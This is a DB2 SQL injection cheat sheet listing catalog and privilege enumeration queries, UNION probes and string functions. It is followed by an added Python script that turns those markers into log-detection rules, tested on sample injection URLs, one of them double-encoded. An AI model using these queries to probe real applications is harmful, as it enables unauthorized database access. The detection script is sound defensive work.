DB2 SQL Injection Cheat Sheet
Source: Internet | Published by: 织梦head模板 | Editor: 程序博客网 | Time: 2024/06/04 23:23
Finding a SQL injection vulnerability in a web application backed by DB2 isn't too common in my experience. When you do find one, though, it pays to be prepared...
Below are some tabulated notes on how to do many of the things you'd normally do via SQL injection. All tests were performed on DB2 8.2 under Windows.
Comments
select blah from foo; -- comment like this

Batching Queries Allowed?
???

Database Version
select versionnumber, version_timestamp from sysibm.sysversions;

Current Database User
select user from sysibm.sysdummy1;
select session_user from sysibm.sysdummy1;
select system_user from sysibm.sysdummy1;

Current Database
select current server from sysibm.sysdummy1;

Limiting Rows Returned
SELECT foo FROM bar fetch first 1 rows only;

Returning N Rows starting at Offset M
select name from (SELECT name FROM sysibm.systables order by name fetch first N+M-1 rows only) sq order by name desc fetch first N rows only;

List Tables
select name from sysibm.systables;

List Columns
select name, tbname, coltype from sysibm.syscolumns;

List Database Users and Passwords
Database authorities (like roles, I think) can be listed like this:
select grantee from syscat.dbauth;

FROM clause mandated in SELECTs?
Yes, use sysibm.sysdummy1:
select 123 from sysibm.sysdummy1;

UNION supported
Yes
select 123 from sysibm.sysdummy1 union select 234 from sysibm.sysdummy1;

Enumerate Tables Privs
select * from syscat.tabauth;

Enumerate Current Privs
select * from syscat.dbauth where grantee = current user;
select * from syscat.tabauth where grantee = current user;

Length of a string
select length('abc') from sysibm.sysdummy1; -- returns 3

Bitwise AND
This page seems to indicate that DB2 has no support for bitwise operators!

Substring
SELECT SUBSTR('abc',2,1) FROM sysibm.sysdummy1; -- returns b

ASCII value of a character
select ascii('A') from sysibm.sysdummy1; -- returns 65

Character from ASCII value
select chr(65) from sysibm.sysdummy1; -- returns 'A'

Roles and passwords
N/A (I think DB2 uses OS-level user accounts for authentication.)

List Database Procedures
???

Create Users + Granting Privs
???

Time Delays
???

Execute OS Commands
???

Write to File System
???

Concatenation
SELECT 'a' concat 'b' concat 'c' FROM sysibm.sysdummy1; -- returns 'abc'
select 'a' || 'b' from sysibm.sysdummy1; -- returns 'ab'

Casting
SELECT cast('123' as integer) FROM sysibm.sysdummy1;
SELECT cast(1 as char) FROM sysibm.sysdummy1;

List schemas
SELECT schemaname FROM syscat.schemata;
This page will probably remain a work-in-progress for some time yet. I'll update it as I learn more.
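As an added example (not part of the original cheat sheet), the following Python script turns the DB2-specific markers from the table above (sysibm.sysdummy1, the syscat/sysibm catalog views, fetch first ... rows only, the string functions and comment terminator) into detection rules and runs them over a few constructed web-server log lines. The common log format, the double URL-decoding and the two-marker alert threshold are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Markers of DB2-specific probing, taken from the queries in the cheat sheet above.
DB2_SIGNATURES = {
    "dummy_table":  re.compile(r"\bsysibm\.sysdummy1\b", re.I),
    "catalog_enum": re.compile(r"\b(sysibm\.(systables|syscolumns|sysversions)"
                               r"|syscat\.(dbauth|tabauth|schemata))\b", re.I),
    "union_probe":  re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "row_limit":    re.compile(r"\bfetch\s+first\s+\d+\s+rows?\s+only\b", re.I),
    "string_func":  re.compile(r"\b(substr|ascii|chr|length)\s*\(", re.I),
    "concat":       re.compile(r"\|\||\bconcat\b", re.I),
    "comment_tail": re.compile(r"--"),
}

# Common log format (assumed): client IP, then the quoted "METHOD URL PROTOCOL" request line.
LOG_LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<url>\S+) \S+" (?P<status>\d{3})')

def match_signatures(raw_url):
    """Return the names of every DB2-probe signature found in a URL (decoded twice to catch double encoding)."""
    decoded = unquote_plus(unquote_plus(raw_url))
    return [name for name, rx in DB2_SIGNATURES.items() if rx.search(decoded)]

def scan_log(lines, threshold=2):
    """Return (ip, url, hits) for each request that triggers at least `threshold` signatures.
    A single marker such as '--' or 'length' occurs in ordinary search terms, so one hit alone is ignored."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        hits = match_signatures(m.group("url"))
        if len(hits) >= threshold:
            findings.append((m.group("ip"), m.group("url"), hits))
    return findings

# Constructed sample log (not real traffic): a benign request, two DB2 probes built from the
# cheat sheet's own queries (the second one double URL-encoded), and a benign '--' in a search term.
SAMPLE_LOG = [
    '10.0.0.5 - - [04/Jun/2024:10:01:02 +0000] "GET /item?id=7 HTTP/1.1" 200 512',
    '10.0.0.9 - - [04/Jun/2024:10:01:05 +0000] "GET /item?id=7+union+select+grantee+from+syscat.dbauth+fetch+first+1+rows+only-- HTTP/1.1" 500 210',
    '10.0.0.9 - - [04/Jun/2024:10:01:07 +0000] "GET /item?id=7%2520union%2520select%2520123%2520from%2520sysibm.sysdummy1-- HTTP/1.1" 500 210',
    '10.0.0.3 - - [04/Jun/2024:10:02:00 +0000] "GET /search?q=cable--length HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for ip, url, hits in scan_log(SAMPLE_LOG):
        print(f"{ip} {url} -> {', '.join(hits)}")
```

Pairing these rules with the 500 responses in the same log lines is a cheap way to separate probes that reached the database from ones the application rejected.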